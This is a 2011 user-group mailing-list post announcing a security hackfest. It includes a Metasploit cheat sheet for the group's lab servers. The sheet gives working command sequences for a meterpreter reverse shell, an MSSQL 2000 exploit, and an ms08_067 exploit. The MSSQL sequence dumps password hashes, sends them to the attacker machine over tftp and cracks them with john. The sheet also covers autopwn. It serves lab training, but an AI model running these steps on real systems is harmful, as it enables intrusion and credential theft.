PLUG Security Team @ Gangplankhq.com Saturday 1/29/2011, 12:00 - 15:00 Steven Kaplan's Cloud Target && Rapid7 Exposed

Lisa Kachold lisakachold at obnosis.com
Fri Jan 28 21:20:25 MST 2011


*CLOUD Targets/Rapid7 <http://www.rapid7.com/> Scanner Presented*

Steven Kaplan, MSC, BSEE, CISSP, CISA (Senior Cyber Security Analyst,
DOE Palo Verde Nuclear Facility) will be presenting *a full-blown
(licensed) version of Rapid7*, while letting *us bust his cloud*.

Mr. Kaplan has extensive experience in all areas of computer and network
security, from instructor to practitioner. His combined problem solving,
insights, innovations, programming and integration techniques have saved
companies (in some cases) millions of dollars in avoided fines, and have
achieved innovative process optimizations, gains not strictly limited to
computer security. Steven holds the relevant industry CISA, CISSP and
Ethical Hacker certifications. Steve's scope includes process automation,
especially related to collecting network security vulnerabilities and
user ID revalidation, within and outside of HIPAA, PCI and SOX compliance.

Activities over the last 20 years cover both Federal Government (NSA)
INFOSEC experience and private sector work for national and international
industries. Technological experience includes evaluation of Role Based
Access Control (RBAC) systems, Java software review (for vulnerabilities),
ethical hacking (EH) as well as design, evaluation, certification and
accreditation (C&A) of security architectures and infrastructures.
Evaluating varied systems and diverse integrated networks, including
service-oriented architecture (SOA), for security vulnerabilities within
legislative compliance requirements keeps Mr. Kaplan from straight
command-line reverse engineering, perhaps his first love? Audit experience
includes review for compliance with Sarbanes-Oxley and HIPAA regulations,
and the development of specialized software tools and scripts to expedite
compliance.

During the day, I will be building persistent BT4R2 USB pendrive keys for
your software and network pentesting pleasure (bring a 3GB or greater flash
drive) as we move through Steve's extensive presentation content. End
result = persistent Ubuntu Backtrack4R2! I will be using my own ISO, so
optionally bring your own MD5 checksum to verify integrity.

This will be a mixed format: Presentation/Lab (with full duplex audience
communications so that the community provides content expansion and more).

*Scott Becerra's Layer 7 Web Flag Server* will also be on hand (if you
didn't get to pwn it last time), and will be available until Scott moves
south to work for the Army, hopefully at least until mid-February. We plan
another Hamachi Hackfest so we can enjoy Scott's company again after he
moves south.

*Show up Saturday with your 3GB Flashdrive/Notebook and you might just need
this CheatSheet to poke the PLUG Pentesting Exploit Training Servers/Cloud:*

*HowTo's for basic Metasploit from Backtrack4R2:*

0) Quick Windows MultiHandler Reverse Shell

startx
/etc/init.d/wicd start
{check your wireless or wired connection is working}
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.666 LPORT=4444
>/root/payload.exe
optimize /root/putty.exe (for Windows target)
msfconsole
msf> use exploit/multi/handler
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> show options
msf> set RHOST (local host ip)
msf> shell go
meterpreter > migrate <process #>
example  meterpreter > migrate 256
msf> show exploits
msf> use name (from show exploits)
msf> set PAYLOAD
msf> set RHOST
msf> set LHOST

1) Nmap Mssql 2000
nmap -sT -O 10.10.10.254
nmap -sV 10.10.10.254
msfconsole
show exploits
cut and paste with your mouse highlight
use mssql2000_resolution
set PAYLOAD win32_bind_meterpreter
show options
set RHOST (target) 10.10.10.254
exploit
help
execute -n Process
execute -f file
execute -f cmd -c
interact 1
ipconfig
see Menu---->System-->MISC--->TFTPD Server Start
On your Backtrack Linux shell:
cd /pentest/windows-binaries/tools
ls
cp PwDmp4.dll /tmp/PwDmp4.exe
cd /pentest/password/dictionaries
ls
cp wordlist.txt.gz /tmp/wordlist.txt
tftp -i 10.10.10.254 get PwDump4.dll (or exe)
tftp -i 10.10.10.254 get nc.exe
<go back to windows shell>
pwDmp4.exe
pwDmp4.exe \l \o:pwdmp4.txt
tftp 10.10.10.666 (our ip) put pwdmp4.txt
<back to linux BT environment shell>
cat pwdmp4.txt
john pwdmp4.txt
john -show pwdmp4.txt
john -w:wordlist.txt -f:NT pwdmp4.txt
<back to Windows>
nc -L -p 10.10.10.254
<back to BT linux shell>
telnet victim - login as Administrator with password

2) Quick VNC using Autopwn
msfconsole
db_create foo
db_nmap <targetip or> 10.10.10.254
db_autopwn -h
db_autopwn -p -e
sessions -i 1
sysinfo
run vnc_oneport

3) Quick SMB (use another exploit if you like) & VNC Reverse Shell
msfconsole
use windows/smb/ms08_067_netapi
show options
set PAYLOAD windows/vncinject/reverse_tcp
show options
set RHOST 10.10.10.254
show options
set LHOST 10.10.10.666
exploit
<spawns a shell on reverse machine>

4) Example using Nessus Plugins and db_autopwn
<shell>
apt-get install nessusd nessus
nessusd (takes about 10 minutes to start)
cd /pentest/exploits/framework3
svn update
./msfconsole
<another shell>
./nessus
 Start a scan and Generate a Report
msf> help
msf> db_create /root/database/foobar.db
msf> db_import
      (cross-reference the Nessus report for the open port and the probable
      exploit it reports)
Save output of the Nessus report to /root/nessus.nbe
msf> db_import_nessus_nbe /root/nessus.nbe
msf> db_autopwn -p -e
Voila!

*DISCLAIMER: The use of Backtrack4R2 is advocated in pentest laboratories
only, and for fully qualified professionals in production systems only after
written corporate approval. We do not advocate "cracking" and prefer the
definition of hacker in its original sense, meaning those who reverse
engineer and creatively find alternate uses for common IT systems. With a
group educational focus, PLUG Hackfests do not advocate "learning to hack";
instead, hacking to learn.*

Please come to our next PLUG Linux Security Team HackFest at Gangplankhq.com
the Second and Third Saturdays Noon - 3PM
Attend long enough and we morph into a team.
-- 

(503) 754-4452
(623) 688-3392

 http://www.obnosis.com
*Catch My MetaSploit & IP CAM Surveillance
Presentations @ ABLEConf.com in April!*